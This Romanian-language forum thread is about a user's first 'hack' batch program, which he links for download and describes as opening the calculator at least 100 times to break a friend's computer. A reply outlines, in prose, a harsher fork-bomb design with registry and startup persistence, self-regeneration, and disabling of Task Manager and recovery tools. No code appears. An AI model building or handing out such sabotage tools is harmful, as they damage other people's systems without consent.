Jump to content
dragosh123

Program de flood (made by Dragosh123)

Recommended Posts

Am creat de curand sa creez un mic program in batch care iti floodeaza calculatorul rau de tot incat trebuie sa-ti cumperi unul nou...

Download link:http://rapidshare.com/files/96455131/Hack_flood.bat.html

Obiectivele programului:

1.Foloseste comanda <start calc> de cel putin 100 de ori

2.La sfarsit scrie <Thanks for downloading a virus>

Pentru ce va trebuie programul asta?

R:Pentru a strica calculatorul unui prieten

WARNING:Cat timp nu il deschideti acest program nu va face nimic (puteti si sa-l redenumiti doar lasati extensia .bat)

EDIT:Este primul meu program de hack

Link to comment
Share on other sites

Am creat de curand sa creez un mic program in batch care iti floodeaza calculatorul rau de tot incat trebuie sa-ti cumperi unul nou...

Download link:RapidShare: 1-CLICK Web hosting - Easy Filehosting

Obiectivele programului:

1.Foloseste comanda <start calc> de cel putin 100 de ori

2.La sfarsit scrie <Thanks for downloading a virus>

Pentru ce va trebuie programul asta?

R:Pentru a strica calculatorul unui prieten

WARNING:Cat timp nu il deschideti acest program nu va face nimic (puteti si sa-l redenumiti doar lasati extensia .bat)

EDIT:Este primul meu program de hack

hahahahaha

Link to comment
Share on other sites

Doamne, voi inca mai postati la Cosul de gunoi :)).

@Dragosh123 proba de microfon nu te-ai gandit putin ca in loc sa deschizi 100 de calculatoare poti deschide la infinit cmd.exe minimizate, dar de ce sa deschizi la infinit dintr-un fisier, cum ar fi sa deschizi din 10 fisiere simultan ferestrea la infinit sau sa se creeze fisiere ce creaza si alte fisiere cu nume atent selectate ce deschid ferestre la infinit minimizate puse pe modul /realtime, in momentul acela poti avea quad core de 6 ghz, procesorul ingheata instantaneu. Bine user-ul da restart si scapa de loop, dar de ce sa nu adaogi o cheie in registrii la toate sectiunile de start-up si run, cat si in autoexec.bat si alte metode. Fiecare fisier sa aiba un fel de inteligenta artificiala ca in caz de se sterge vreun fisier / cheie sa se puna la loc sa se regenereze. Mai ramane sa dai disable la task manager, system recovery si alte servicii mai importante stergi regedit-ul, poate reusesti sa faci ceva sa se deschida si in safe-mode si de abia atunci poate user-ul in cel mai rau caz va fi nevoit sa foloseasca un live cd pentru a nu boot-a sistemul de operare afectat sau un hdd al unui prieten si apoi curata "murdariile" si nu mai are niciun stres. Nici macar nu e nevoit sa-si reinstaleze sistemul de operare, dapai sa-si mai cumpere un pc nou =]. Just think 1337.

Link to comment
Share on other sites

am citit foarte clar un topic pe aici ca orice tip de virus/program nu poate distruge calculatorul 100%.. poate un overclock ...dar programul tau in cel mai bun caz afecteaza umpic sistemul de operare..desigur sunt virusi care necesita reinstalearea sistemului de operare..dar al tau nu necesita asta..asadar bft mai incearca! ;)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...